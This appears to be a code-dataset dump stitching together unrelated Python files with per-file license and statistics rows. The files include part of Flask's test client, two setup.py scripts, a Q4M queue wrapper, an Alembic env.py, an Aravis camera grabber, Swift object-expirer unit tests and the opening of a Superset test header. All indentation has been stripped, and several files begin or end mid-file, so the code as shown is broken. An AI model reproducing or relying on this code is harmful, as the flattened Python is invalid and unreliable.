from flask import _request_ctx_stack
from flask.json import dumps as json_dumps
try:
from werkzeug.urls import url_parse
except ImportError:
from urlparse import urlsplit as url_parse
def make_test_environ_builder(
app, path='/', base_url=None, subdomain=None, url_scheme=None,
*args, **kwargs
):
"""Creates a new test builder with some application defaults thrown in."""
assert (
not (base_url or subdomain or url_scheme)
or (base_url is not None) != bool(subdomain or url_scheme)
), 'Cannot pass "subdomain" or "url_scheme" with "base_url".'
if base_url is None:
http_host = app.config.get('SERVER_NAME') or 'localhost'
app_root = app.config['APPLICATION_ROOT']
if subdomain:
http_host = '{0}.{1}'.format(subdomain, http_host)
if url_scheme is None:
url_scheme = app.config['PREFERRED_URL_SCHEME']
url = url_parse(path)
base_url = '{0}://{1}/{2}'.format(
url_scheme, url.netloc or http_host, app_root.lstrip('/')
)
path = url.path
if url.query:
sep = b'?' if isinstance(url.query, bytes) else '?'
path += sep + url.query
if 'json' in kwargs:
assert 'data' not in kwargs, (
"Client cannot provide both 'json' and 'data'."
)
# push a context so flask.json can use app's json attributes
with app.app_context():
kwargs['data'] = json_dumps(kwargs.pop('json'))
if 'content_type' not in kwargs:
kwargs['content_type'] = 'application/json'
return EnvironBuilder(path, base_url, *args, **kwargs)
class FlaskClient(Client):
"""Works like a regular Werkzeug test client but has some knowledge about
how Flask works to defer the cleanup of the request context stack to the
end of a ``with`` body when used in a ``with`` statement. For general
information about how to use this class refer to
:class:`werkzeug.test.Client`.
.. versionchanged:: 0.12
`app.test_client()` includes preset default environment, which can be
set after instantiation of the `app.test_client()` object in
`client.environ_base`.
Basic usage is outlined in the :ref:`testing` chapter.
"""
preserve_context = False
def __init__(self, *args, **kwargs):
super(FlaskClient, self).__init__(*args, **kwargs)
self.environ_base = {
"REMOTE_ADDR": "127.0.0.1",
"HTTP_USER_AGENT": "werkzeug/" + werkzeug.__version__
}
@contextmanager
def session_transaction(self, *args, **kwargs):
"""When used in combination with a ``with`` statement this opens a
session transaction. This can be used to modify the session that
the test client uses. Once the ``with`` block is left the session is
stored back.
::
with client.session_transaction() as session:
session['value'] = 42
Internally this is implemented by going through a temporary test
request context and since session handling could depend on
request variables this function accepts the same arguments as
:meth:`~flask.Flask.test_request_context` which are directly
passed through.
"""
if self.cookie_jar is None:
raise RuntimeError('Session transactions only make sense '
'with cookies enabled.')
app = self.application
environ_overrides = kwargs.setdefault('environ_overrides', {})
self.cookie_jar.inject_wsgi(environ_overrides)
outer_reqctx = _request_ctx_stack.top
with app.test_request_context(*args, **kwargs) as c:
session_interface = app.session_interface
sess = session_interface.open_session(app, c.request)
if sess is None:
raise RuntimeError('Session backend did not open a session. '
'Check the configuration')
# Since we have to open a new request context for the session
# handling we want to make sure that we hide out own context
# from the caller. By pushing the original request context
# (or None) on top of this and popping it we get exactly that
# behavior. It's important to not use the push and pop
# methods of the actual request context object since that would
# mean that cleanup handlers are called
_request_ctx_stack.push(outer_reqctx)
try:
yield sess
finally:
_request_ctx_stack.pop()
resp = app.response_class()
if not session_interface.is_null_session(sess):
session_interface.save_session(app, sess, resp)
headers = resp.get_wsgi_headers(c.request.environ)
self.cookie_jar.extract_wsgi(c.request.environ, headers)
def open(self, *args, **kwargs):
kwargs.setdefault('environ_overrides', {}) \
['flask._preserve_context'] = self.preserve_context
kwargs.setdefault('environ_base', self.environ_base)
as_tuple = kwargs.pop('as_tuple', False)
buffered = kwargs.pop('buffered', False)
follow_redirects = kwargs.pop('follow_redirects', False)
builder = make_test_environ_builder(self.application, *args, **kwargs)
return Client.open(self, builder,
as_tuple=as_tuple,
buffered=buffered,
follow_redirects=follow_redirects)
def __enter__(self):
if self.preserve_context:
raise RuntimeError('Cannot nest client invocations')
self.preserve_context = True
return self
def __exit__(self, exc_type, exc_value, tb):
self.preserve_context = False
# on exit we want to clean up earlier. Normally the request context
# stays preserved until the next request in the same thread comes
# in. See RequestGlobals.push() for the general behavior.
top = _request_ctx_stack.top
if top is not None and top.preserved:
top.pop()
| bsd-3-clause | -7,685,442,334,930,626,000 | 36.76 | 78 | 0.611834 | false |
StartTheShift/thunderdome-logging | setup.py | 1 | 1329 | import sys
from setuptools import setup, find_packages
#next time:
#python setup.py register
#python setup.py sdist upload
version = open('thunderdome_logging/VERSION', 'r').readline().strip()
long_desc = """
Extension for thunderdome which allows error logging in the graph.
"""
setup(
name='thunderdome-logging',
version=version,
description='Thunderdome graph error logging',
dependency_links=['https://github.com/StartTheShift/thunderdome-logging/archive/{0}.tar.gz#egg=thunderdome-logging-{0}'.format(version)],
long_description=long_desc,
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Environment :: Plugins",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
],
keywords='cassandra,titan,ogm,thunderdome,logging',
install_requires=['thunderdome==0.4.3'],
author='StartTheShift',
author_email='[email protected]',
url='https://github.com/StartTheShift/thunderdome-logging',
license='BSD',
packages=find_packages(),
include_package_data=True,
)
| mit | 7,834,285,208,966,804,000 | 33.076923 | 141 | 0.669676 | false |
cubicdaiya/python-q4m | python_q4m/__init__.py | 1 | 1380 | # -*- coding: utf-8 -*-
import python_q4m
__author__ = "Tatsuhiko Kubo ([email protected])"
__version__ = "0.0.6"
__license__ = "GPL2"
__doc__ = """
This module is simple Q4M operation wrapper developed by pixiv Inc. for asynchronous upload system
Simple example of usage is followings
>>> from python_q4m.q4m import *
>>> class QueueTable(Q4M):
>>> def __init__(self, con):
>>> super(self.__class__, self).__init__(con)
>>> self.table = 'queue_table'
>>> self.columns = ['id',
>>> 'msg',
>>> ]
>>> try:
>>> con = MySQLdb.connect(host='localhost',
>>> db=dbname,
>>> user=username,
>>> passwd=password,
>>> )
>>> q = QueueTable(con)
>>> q.enqueue([1, 'msg'])
>>> while q.wait() == 0:
>>> time.sleep(1);
>>> res = q.dequeue()
>>> print res['id']
>>> print res['msg']
>>> q.end()
>>> con.close()
>>> except MySQLdb.Error, e:
>>> print 'Error %d: %s' % (e.args[0], e.args[1])
>>> q.abort()
>>> con.close()
And it is necessary to create following table for above example.
CREATE TABLE `queue_table` (`id` int(11) NOT NULL, `msg` text NOT NULL) ENGINE=QUEUE;
"""
| gpl-2.0 | 372,192,313,206,318,800 | 30.363636 | 98 | 0.465942 | false |
gthank/pytips | alembic/env.py | 1 | 2550 | from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
from pytips import app
cur_db_uri = config.get_section_option('alembic', 'sqlalchemy.url')
my_db_uri = app.config.get('SQLALCHEMY_DATABASE_URI', cur_db_uri)
config.set_section_option('alembic', 'sqlalchemy.url', my_db_uri)
# This next line will cause my model definitions to fire, which is what sets up
# the metadata we're about to hand to Alembic.
from pytips import models
# OK, the previous line initialized the metadata in the db.Model object, so now
# we import db so we can get it and give it to Alembic.
from pytips import db
target_metadata = db.Model.metadata
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = engine_from_config(
config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool)
# I need to reuse the connection the ORM is using.
connection = models.Tip.query.session.connection()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| isc | -8,752,441,984,729,038,000 | 30.097561 | 79 | 0.698824 | false |
semeniuta/FlexVi | flexvi/daq/aravisgrabber.py | 1 | 1399 | from enum import Enum
from gi.repository import Aravis as ar
import aravis as pyar
class AravisEnv:
def __init__(self):
''' Get device IDs and initialize Camera objects '''
ar.update_device_list()
self.device_ids = pyar.get_device_ids()
self.cameras = {i: pyar.Camera(i) for i in self.device_ids}
class AravisGrabber:
States = Enum('States', 'not_initialized not_functional initialized camera_selected')
currtent_state = States.not_initialized
current_camera = None
def __init__(self, env):
self.env = env
def select_camera_by_id(self, camera_id):
if camera_id not in self.device_ids:
raise Exception('Incorrect device id provided')
self.current_camera = self.env.cameras[camera_id]
self.current_state = self.States.camera_selected
def select_camera_by_index(self, idx):
if idx < 0 or idx > len(self.env.device_ids):
raise Exception('Incorrect device index provided')
self.current_camera = self.env.cameras[self.env.device_ids[idx]]
self.current_state = self.States.camera_selected
def grab_image(self):
print 'Grabbing...'
if self.current_state is not self.States.camera_selected:
raise Exception('No camera has been selected')
im = pyar.get_frame(self.current_camera)
return im
| gpl-2.0 | -4,096,126,815,948,293,000 | 35.815789 | 89 | 0.643317 | false |
eliostvs/tomate-exec-plugin | setup.py | 1 | 1335 | #!/bin/env python
import os
from setuptools import setup
def find_xdg_data_files(syspath, relativepath, pkgname, data_files=[]):
for (dirname, _, filenames) in os.walk(relativepath):
if filenames:
syspath = syspath.format(pkgname=pkgname)
subpath = dirname.split(relativepath)[1]
if subpath.startswith("/"):
subpath = subpath[1:]
files = [os.path.join(dirname, f) for f in filenames]
data_files.append((os.path.join(syspath, subpath), files))
return data_files
def find_data_files(data_map, pkgname):
data_files = []
for (syspath, relativepath) in data_map:
find_xdg_data_files(syspath, relativepath, pkgname, data_files)
return data_files
DATA_FILES = [
("share/{pkgname}/plugins", "data/plugins"),
]
setup(
author="Elio Esteves Duarte",
author_email="[email protected]",
description="Tomate plugin that executes commands when the timer starts, stops or finish",
include_package_data=True,
keywords="pomodoro,tomate",
license="GPL-3",
long_description=open("README.md").read(),
name="tomate-exec-plugin",
data_files=find_data_files(DATA_FILES, "tomate"),
url="https://github.com/eliostvs/tomate-exec-plugin",
version="0.5.0",
zip_safe=False,
)
| gpl-3.0 | -5,612,258,948,244,956,000 | 26.244898 | 94 | 0.64794 | false |
larsbutler/swift | test/unit/obj/test_expirer.py | 1 | 28044 | # Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import time
from unittest import main, TestCase
from test.unit import FakeRing, mocked_http_conn, debug_logger
from copy import deepcopy
from tempfile import mkdtemp
from shutil import rmtree
import mock
import six
from six.moves import urllib
from swift.common import internal_client, utils, swob
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
internal_client = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda *a, **kw: None
internal_client.sleep = not_sleep
self.rcache = mkdtemp()
self.conf = {'recon_cache_path': self.rcache}
self.logger = debug_logger('test-expirer')
def tearDown(self):
rmtree(self.rcache)
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.old_loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
x.get_process_values(vals)
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
x.get_process_values({})
self.assertEqual(x.processes, 5)
self.assertEqual(x.process, 1)
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
self.obj_containers_in_order = []
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
self.obj_containers_in_order.append(container)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': six.text_type(x)}
for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': six.text_type(x)}
for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
'0': set('1-one 2-two 3-three'.split()),
'1': set('2-two 3-three 4-four'.split()),
'2': set('5-five 6-six'.split()),
'3': set(u'7-seven\u2661'.split()),
}
x = ObjectExpirer(self.conf)
x.swift = InternalClient(containers)
deleted_objects = {}
for i in range(3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers['3'].pop(),
deleted_objects['3'].pop().decode('utf8'))
self.assertEqual(containers, deleted_objects)
self.assertEqual(len(set(x.obj_containers_in_order[:4])), 4)
def test_delete_object(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
actual_obj = 'actual_obj'
timestamp = int(time())
reclaim_ts = timestamp - x.reclaim_age
container = 'container'
obj = 'obj'
http_exc = {
resp_code:
internal_client.UnexpectedResponse(
str(resp_code), swob.HTTPException(status=resp_code))
for resp_code in {404, 412, 500}
}
exc_other = Exception()
def check_call_to_delete_object(exc, ts, should_pop):
x.logger.clear()
start_reports = x.report_objects
with mock.patch.object(x, 'delete_actual_object',
side_effect=exc) as delete_actual:
with mock.patch.object(x, 'pop_queue') as pop_queue:
x.delete_object(actual_obj, ts, container, obj)
delete_actual.assert_called_once_with(actual_obj, ts)
log_lines = x.logger.get_lines_for_level('error')
if should_pop:
pop_queue.assert_called_once_with(container, obj)
self.assertEqual(start_reports + 1, x.report_objects)
self.assertFalse(log_lines)
else:
self.assertFalse(pop_queue.called)
self.assertEqual(start_reports, x.report_objects)
self.assertEqual(1, len(log_lines))
self.assertIn('Exception while deleting object container obj',
log_lines[0])
# verify pop_queue logic on exceptions
for exc, ts, should_pop in [(None, timestamp, True),
(http_exc[404], timestamp, False),
(http_exc[412], timestamp, False),
(http_exc[500], reclaim_ts, False),
(exc_other, reclaim_ts, False),
(http_exc[404], reclaim_ts, True),
(http_exc[412], reclaim_ts, True)]:
try:
check_call_to_delete_object(exc, ts, should_pop)
except AssertionError as err:
self.fail("Failed on %r at %f: %s" % (exc, ts, err))
def test_report(self):
x = expirer.ObjectExpirer({}, logger=self.logger)
x.report()
self.assertEqual(x.logger.get_lines_for_level('info'), [])
x.logger._clear()
x.report(final=True)
self.assertTrue(
'completed' in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' not in str(x.logger.get_lines_for_level('info')))
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue(
'completed' not in str(x.logger.get_lines_for_level('info')))
self.assertTrue(
'so far' in str(x.logger.get_lines_for_level('info')))
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.get_lines_for_level('error'),
["Unhandled exception: "])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
"'str' object has no attribute 'get_account_info'")
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_once_unicode_problem(self):
class InternalClient(object):
container_ring = FakeRing()
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return [{'name': u'1234'}]
def iter_objects(*a, **kw):
return [{'name': u'1234-troms\xf8'}]
def make_request(*a, **kw):
pass
def delete_container(*a, **kw):
pass
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
x.swift = InternalClient()
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests):
x.run_once()
self.assertEqual(len(requests), 3)
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer(self.conf,
logger=self.logger)
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
logs = x.logger.all_log_lines()
self.assertEqual(logs['info'], [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
self.assertTrue('error' not in logs)
# Reverse test to be sure it still would blow up the way expected.
fake_swift = InternalClient([{'name': str(int(time() - 86400))}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'), [
'Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][-1]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'This should not have been called')
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.run_once()
self.assertTrue('error' not in x.logger.all_log_lines())
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = should_not_be_called
x.run_once()
self.assertEqual(
x.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj '
'This should not have been called: ' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.iter_containers = lambda: [str(int(time() - 86400))]
x.delete_actual_object = deliberately_blow_up
x.pop_queue = should_not_get_called
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(
error_lines,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object: ' % (ts, ts)])
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
self.logger._clear()
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = should_not_get_called
x.run_once()
self.assertEqual(
self.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj This should '
'not have been called: ' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-acc/c/actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
with mock.patch('swift.obj.expirer.MAX_OBJECTS_TO_CACHE', 0):
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'),
['Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired'])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, six.text_type):
got_unicode[0] = True
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = delete_actual_object_test_for_unicode
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired',
])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(sorted(error_lines), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container: ' % (cts,),
'Exception while deleting container %d failed to delete '
'container: ' % (cts + 1,)]))
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({}, logger=self.logger)
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.get_lines_for_level('error'),
['Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'exception 1')
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_raises_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_raises_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
'503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
self.assertEqual(x.swift.make_request.call_count, 1)
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.parse.quote(name))
def test_pop_queue(self):
class InternalClient(object):
container_ring = FakeRing()
x = expirer.ObjectExpirer({}, logger=self.logger,
swift=InternalClient())
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests) as fake_conn:
x.pop_queue('c', 'o')
self.assertRaises(StopIteration, fake_conn.code_iter.next)
for method, path in requests:
self.assertEqual(method, 'DELETE')
device, part, account, container, obj = utils.split_path(
path, 5, 5, True)
self.assertEqual(account, '.expiring_objects')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
if __name__ == '__main__':
main()
| apache-2.0 | 5,540,752,920,553,979,000 | 34.861893 | 78 | 0.54525 | false |
apache/incubator-superset | tests/charts/api_tests.py | 1 | 62443 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
